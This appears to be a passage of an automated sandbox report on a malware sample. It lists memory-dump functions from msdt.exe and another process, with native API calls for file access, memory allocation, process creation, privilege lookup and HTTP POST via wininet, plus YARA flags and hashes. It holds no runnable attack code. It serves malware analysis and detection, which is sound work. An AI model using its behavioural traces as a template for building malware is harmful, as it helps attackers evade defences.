                                                      • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                      • Instruction Fuzzy Hash: 28C08C32080248BBC7126A45CD04F01BB29E7A0B60F000024B6040A6618932E860D988
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017B76E2, Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                      • Instruction ID: 0141ad9b126373acd7e2c9eb5146359efb69b041d6db10e769cb5318306f59fa
                                                      • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                      • Instruction Fuzzy Hash: 68C08C701411C45AEB2E570CCE68B20BA50AB48B0CF48019CAA010D4E2C368EC02D608
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017D36CC, Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                      • Instruction ID: abfc8ab58e734cdc2c6f3b04fce50f2a970f702bea00281a59edf2136fd27567
                                                      • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                      • Instruction Fuzzy Hash: F2C02BB0150440FBD7251F30CD10F14F274F700F21F64035C7321554F4D5299C00D101
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017C7D50, Relevance: .0, Instructions: 7COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                      • Instruction ID: 21ee87a74434cfa7804dead83464fd936e20f400742cd4caaa3f9c6c06044c67
                                                      • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                      • Instruction Fuzzy Hash: 0BB092353019418FCE5ADF18C080B1573E8BB44B40F8400D8E400CBA21D229E8408900
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017D2ACB, Relevance: .0, Instructions: 5COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                      • Instruction ID: 4d4136843b52cda22022998e84203f70f07fa6e10037074d9aeffc0f6cd224e3
                                                      • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                      • Instruction Fuzzy Hash: AFB01232C10441CFCF02EF44C650F9AB331FB00750F0544A0900227A30C728AC01CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Analysis Process: msdt.exe PID: 6468 Parent PID: 3440 msdt.exeCOMMON

                                                      Executed Functions

                                                      Function 00639F20, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wKc,007A002E,00000000,00000060,00000000,00000000), ref: 00639F6D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID: .z`$wKc
                                                      • API String ID: 823142352-2294097093
                                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                      • Instruction ID: b75a49939b3f62fbc8736dc25028e234b3a52b50e381701fcd4237e1049dd974
                                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                      • Instruction Fuzzy Hash: 83F0B2B2200208ABCB48CF88DC95EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00639FCA, Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtReadFile.NTDLL(?,?,FFFFFFFF,006349F1,?,?,?,?,006349F1,FFFFFFFF,?,2Mc,?,00000000), ref: 0063A015
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 225399049edc95cb88fd6c43675bd67bb03fd26f44da2357de43c504009cf718
                                                      • Instruction ID: 295848b67ad924bedd58be87b57da7ad95c802c309dde492120dddc50a10d767
                                                      • Opcode Fuzzy Hash: 225399049edc95cb88fd6c43675bd67bb03fd26f44da2357de43c504009cf718
                                                      • Instruction Fuzzy Hash: F1F0E2B2200108AFCB14DF99DC91EEB77A9AF8C354F158248BA4DA7241C630E812CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00639FD0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtReadFile.NTDLL(?,?,FFFFFFFF,006349F1,?,?,?,?,006349F1,FFFFFFFF,?,2Mc,?,00000000), ref: 0063A015
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                      • Instruction ID: 1340390f4d2b7e021ffa3f2f73ddb93a911f73c1629744807b661cd4eb76b8e1
                                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                      • Instruction Fuzzy Hash: 11F0A4B2200208ABCB14DF89DC91EEB77ADAF8C754F158249BA1D97241D630E8118BA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0063A100, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00622D11,00002000,00003000,00000004), ref: 0063A139
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                      • Instruction ID: 76a66193d53db03404688873c8895af6628c0b405ded104cd43494de32b96d83
                                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                      • Instruction Fuzzy Hash: B6F015B2200208ABCB14DF89DC81EAB77ADAF88750F118149BE0997241C630F810CBE4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0063A050, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtClose.NTDLL(00634D10,?,?,00634D10,00000000,FFFFFFFF), ref: 0063A075
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                      • Instruction ID: d42fa5d3786f9f5cd4a91155ba32426c7af48e3dad42d8eea16861e61670c530
                                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                      • Instruction Fuzzy Hash: 42D01776200214ABD710EFD8DC85FA7BBADEF48760F154499BA599B242C530FA0087E0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 048995D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.601559435.0000000004830000.00000040.00000001.sdmp, Offset: 04830000, based on PE: true
                                                      • Associated: 00000005.00000002.602371206.000000000494B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000005.00000002.602383095.000000000494F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 93b9de656dcd9cb3f597908c1db6abe1558326d95edeba3a9cf4321384f50707
                                                      • Instruction ID: 6170e85a93784058168690a499863f489a37b0381042460a363b5bcaa4c840da
                                                      • Opcode Fuzzy Hash: 93b9de656dcd9cb3f597908c1db6abe1558326d95edeba3a9cf4321384f50707
                                                      • Instruction Fuzzy Hash: 099002A120200013710571594414616404B97E0245B91C521E200D6E0DD9A5D8A57165
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04899540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.601559435.0000000004830000.00000040.00000001.sdmp, Offset: 04830000, based on PE: true
                                                      • Associated: 00000005.00000002.602371206.000000000494B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000005.00000002.602383095.000000000494F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 4b5f5e98188b7c47285e3df5a19d68a92988ead88d2327cc0e4b918d6d9481bc
                                                      • Instruction ID: 769b6794b6858d5c3de6ae23b14a9a97938a13de752641a2a65fbcae621cb8fd
                                                      • Opcode Fuzzy Hash: 4b5f5e98188b7c47285e3df5a19d68a92988ead88d2327cc0e4b918d6d9481bc
                                                      • Instruction Fuzzy Hash: 6E900265211000133105A5590704507008797D5395391C521F200E6A0CEAA1D8756161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 048996D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.601559435.0000000004830000.00000040.00000001.sdmp, Offset: 04830000, based on PE: true
                                                      • Associated: 00000005.00000002.602371206.000000000494B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000005.00000002.602383095.000000000494F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 6f432133bcbe0dc4a149ef3c82691d9eee0770be1d7ab29b4b06b085c34af46f
                                                      • Instruction ID: 3ac6bca96f0e5d25d0dc0bd60f0d76f0f7ae4f7e67a0946b1c1db20be6f33c85
                                                      • Opcode Fuzzy Hash: 6f432133bcbe0dc4a149ef3c82691d9eee0770be1d7ab29b4b06b085c34af46f
                                                      • Instruction Fuzzy Hash: E090027120100852F10061594404B46004697E0345F91C516A111D7A4D9A95D8657561
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 048996E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.601559435.0000000004830000.00000040.00000001.sdmp, Offset: 04830000, based on PE: true
                                                      • Associated: 00000005.00000002.602371206.000000000494B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000005.00000002.602383095.000000000494F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 0c973c0927afcce8e7842a5489b94fa1314216e3e6fee1797213672e5a92e307
                                                      • Instruction ID: 874ccd3a21eece443163d7c7651f0cf99f08944657794d6eccc5a02335bf200c
                                                      • Opcode Fuzzy Hash: 0c973c0927afcce8e7842a5489b94fa1314216e3e6fee1797213672e5a92e307
                                                      • Instruction Fuzzy Hash: 6D90027120108812F1106159840474A004697D0345F95C911A541D7A8D9AD5D8A57161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04899650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.601559435.0000000004830000.00000040.00000001.sdmp, Offset: 04830000, based on PE: true
                                                      • Associated: 00000005.00000002.602371206.000000000494B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000005.00000002.602383095.000000000494F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d8207a22d33ba58db677e74c106cb1037c5ee4f37aa964ac4e87f3e01690a724
                                                      • Instruction ID: 5a585dcf1b8030cc1f8be073f883572f1c74878fe14035d94ad2eaa2cd44f3c0
                                                      • Opcode Fuzzy Hash: d8207a22d33ba58db677e74c106cb1037c5ee4f37aa964ac4e87f3e01690a724
                                                      • Instruction Fuzzy Hash: 2890027120504852F14071594404A46005697D0349F91C511A105D7E4DAAA5DD69B6A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04899660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.601559435.0000000004830000.00000040.00000001.sdmp, Offset: 04830000, based on PE: true
                                                      • Associated: 00000005.00000002.602371206.000000000494B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000005.00000002.602383095.000000000494F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 73476dcc44fc0cdcfe043a5016f3ee3f2bb4fa70d61bb4aab87c1f8220c1b5e1
                                                      • Instruction ID: 078313b2f63e128a7c3b41b7b2072c989d450e49bd7f7f098a7eca1db645bc9e
                                                      • Opcode Fuzzy Hash: 73476dcc44fc0cdcfe043a5016f3ee3f2bb4fa70d61bb4aab87c1f8220c1b5e1
                                                      • Instruction Fuzzy Hash: 3E90027120100812F1807159440464A004697D1345FD1C515A101E7A4DDE95DA6D77E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04899780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.601559435.0000000004830000.00000040.00000001.sdmp, Offset: 04830000, based on PE: true
                                                      • Associated: 00000005.00000002.602371206.000000000494B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000005.00000002.602383095.000000000494F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 534bb9f49b93a84960c677af9fc290f41ede38d586d2bfa4ecfb0d94760b5b24
                                                      • Instruction ID: c9d02ddd68cf07fa2c56c6908c9e3b7a6de9b1de1da896107daabd065a824950
                                                      • Opcode Fuzzy Hash: 534bb9f49b93a84960c677af9fc290f41ede38d586d2bfa4ecfb0d94760b5b24
                                                      • Instruction Fuzzy Hash: 6190026921300012F1807159540860A004697D1246FD1D915A100E6A8CDD95D87D6361
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04899FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.601559435.0000000004830000.00000040.00000001.sdmp, Offset: 04830000, based on PE: true
                                                      • Associated: 00000005.00000002.602371206.000000000494B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000005.00000002.602383095.000000000494F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e47f1ac2519f474e863d76e27cbcd7037052535a6197a8dd334eb85fffb523a0
                                                      • Instruction ID: a2257e8a71af5a1f616b46b9710444557926a6acac88194f9feebba37968a2b5
                                                      • Opcode Fuzzy Hash: e47f1ac2519f474e863d76e27cbcd7037052535a6197a8dd334eb85fffb523a0
                                                      • Instruction Fuzzy Hash: 2A90027131114412F11061598404706004697D1245F91C911A181D6A8D9AD5D8A57162
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04899710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.601559435.0000000004830000.00000040.00000001.sdmp, Offset: 04830000, based on PE: true
                                                      • Associated: 00000005.00000002.602371206.000000000494B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000005.00000002.602383095.000000000494F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 98da5176d5326b9b4256e194be27b2255ac208db32cfcfbf9de9b2f3e16d44d3
                                                      • Instruction ID: e07599328f18d460a6503d9c0482b0a674df197625c67a7aac9f9588aabdb307
                                                      • Opcode Fuzzy Hash: 98da5176d5326b9b4256e194be27b2255ac208db32cfcfbf9de9b2f3e16d44d3
                                                      • Instruction Fuzzy Hash: F490027120100412F10065995408646004697E0345F91D511A601D6A5EDAE5D8A57171
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04899840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.601559435.0000000004830000.00000040.00000001.sdmp, Offset: 04830000, based on PE: true
                                                      • Associated: 00000005.00000002.602371206.000000000494B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000005.00000002.602383095.000000000494F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: cf0eac8046ebcb2375afe7ad68c79430e326a493b241ae7bbf6fcee061c84c91
                                                      • Instruction ID: 46f563ccb1c6e760875c23837faed4b3e56dc376292a117da93d6a255a59a8bc
                                                      • Opcode Fuzzy Hash: cf0eac8046ebcb2375afe7ad68c79430e326a493b241ae7bbf6fcee061c84c91
                                                      • Instruction Fuzzy Hash: B9900261242041627545B15944045074047A7E02857D1C512A240DAA0C99A6E86AE661
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04899860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.601559435.0000000004830000.00000040.00000001.sdmp, Offset: 04830000, based on PE: true
                                                      • Associated: 00000005.00000002.602371206.000000000494B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000005.00000002.602383095.000000000494F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 14f02057f6a3a2ca49ffb051528ea63212e1eb16857368a53c12b01a5d3d3584
                                                      • Instruction ID: 6064037dd71e9ed347dfe3e49565b06b5aa24bb2725a2223ec6bcc9645fa009d
                                                      • Opcode Fuzzy Hash: 14f02057f6a3a2ca49ffb051528ea63212e1eb16857368a53c12b01a5d3d3584
                                                      • Instruction Fuzzy Hash: 1D90027120100423F11161594504707004A97D0285FD1C912A141D6A8DAAD6D966B161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 048999A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.601559435.0000000004830000.00000040.00000001.sdmp, Offset: 04830000, based on PE: true
                                                      • Associated: 00000005.00000002.602371206.000000000494B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000005.00000002.602383095.000000000494F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: a0e17ccc6a87ddb5ad76513962841ac7b2682e5cb4982e99439f23ce38db3b86
                                                      • Instruction ID: a891f70c84f70c5eaa39ebb0fdb119165c63858059840232ff32f7eb91301c4f
                                                      • Opcode Fuzzy Hash: a0e17ccc6a87ddb5ad76513962841ac7b2682e5cb4982e99439f23ce38db3b86
                                                      • Instruction Fuzzy Hash: 0C9002A134100452F10061594414B060046D7E1345F91C515E205D6A4D9A99DC667166
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04899910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.601559435.0000000004830000.00000040.00000001.sdmp, Offset: 04830000, based on PE: true
                                                      • Associated: 00000005.00000002.602371206.000000000494B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000005.00000002.602383095.000000000494F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: a0656d282599d40b1aa3f5216ac861224f23ebe379194694f643f9888dc8b285
                                                      • Instruction ID: d42019cc2233db7244e34b7d7de38e53fb84c69ed3ab88df70be24d493b240ee
                                                      • Opcode Fuzzy Hash: a0656d282599d40b1aa3f5216ac861224f23ebe379194694f643f9888dc8b285
                                                      • Instruction Fuzzy Hash: FE9002B120100412F14071594404746004697D0345F91C511A605D6A4E9AD9DDE976A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04899A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.601559435.0000000004830000.00000040.00000001.sdmp, Offset: 04830000, based on PE: true
                                                      • Associated: 00000005.00000002.602371206.000000000494B000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000005.00000002.602383095.000000000494F000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 25b419684b007effc014f4ac21a868bfb8aeafdadf4d975a35f4306180e153d8
                                                      • Instruction ID: ce6ec09dde8bc6985e3a10d87837797c4171c61ff652df9992d0b72587976dcd
                                                      • Opcode Fuzzy Hash: 25b419684b007effc014f4ac21a868bfb8aeafdadf4d975a35f4306180e153d8
                                                      • Instruction Fuzzy Hash: 9890026121180052F20065694C14B07004697D0347F91C615A114D6A4CDD95D8756561
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00638C37, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 99sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 00638CE8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: POST$net.dll$wininet.dll
                                                      • API String ID: 3472027048-3140911592
                                                      • Opcode ID: 62104d9826b65d3e527cffbfba621bffbee26d391bfdcf2db237ff4d54b60962
                                                      • Instruction ID: 017f32d46df7ab243c7f7b823b8521d42c29e5135637277cd61ebb08cddfb75c
                                                      • Opcode Fuzzy Hash: 62104d9826b65d3e527cffbfba621bffbee26d391bfdcf2db237ff4d54b60962
                                                      • Instruction Fuzzy Hash: 6531ADB2600744AFC710EF64D886BEAB7B9EF48301F00811DF6199B281DB75A551CBE9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0063A335, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0063A2F4
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0062F192,0062F192,?,00000000,?,?), ref: 0063A3C0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalLookupPrivilegeProcessValue
                                                      • String ID: cP
                                                      • API String ID: 65721159-20271977
                                                      • Opcode ID: bf5667f67d52ab203080a25ff37d22c3e0e9d79f7a60f16617ad5373304358df
                                                      • Instruction ID: d7a4308c04446241290642e299367256a6ddc657098353d1ed7154f6456735a2
                                                      • Opcode Fuzzy Hash: bf5667f67d52ab203080a25ff37d22c3e0e9d79f7a60f16617ad5373304358df
                                                      • Instruction Fuzzy Hash: 5D115EB52002086BDB14DF98EC41EEB73AEEF88750F118659FE4997241C630E9108BF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00638C40, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 00638CE8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: net.dll$wininet.dll
                                                      • API String ID: 3472027048-1269752229
                                                      • Opcode ID: 64c1da11a2fbbb66597a7421ac5ce455c702652de1a51f0790dd60c03a6a93a1
                                                      • Instruction ID: ef93e4351b9685c836d6e29967e62d72b7e7c038f140def5a14dca404d411fa7
                                                      • Opcode Fuzzy Hash: 64c1da11a2fbbb66597a7421ac5ce455c702652de1a51f0790dd60c03a6a93a1
                                                      • Instruction Fuzzy Hash: AB318EB2500744BFC724DF65D885FA7B7B9BF88701F00841DF6299B281DA70A550CBE8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0063A1B6, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00623AF8), ref: 0063A25D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID: .z`
                                                      • API String ID: 3298025750-1441809116
                                                      • Opcode ID: 6e06663a159574a26d939a7b98760d57520f624b921cfca2be9b09d2eaccb7d3
                                                      • Instruction ID: f56911f19be0aca04723a906b3b79d6cccc0a4ecac49333570c26d1e118f23c8
                                                      • Opcode Fuzzy Hash: 6e06663a159574a26d939a7b98760d57520f624b921cfca2be9b09d2eaccb7d3
                                                      • Instruction Fuzzy Hash: 50017CB62002146BDB14DF98DC85EEB77ADEF84760F048459FA595B241C630EA00CBE4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0063A1F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(006344F6,?,?,oLc,?,006344F6,?,?,?,?,?,00000000,00000000,?), ref: 0063A21D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID: oLc
                                                      • API String ID: 1279760036-884827620
                                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                      • Instruction ID: 36477e5a5450966e1b77ff0164f96f74764a7b7f5718706f9606ce05c9d96ac3
                                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
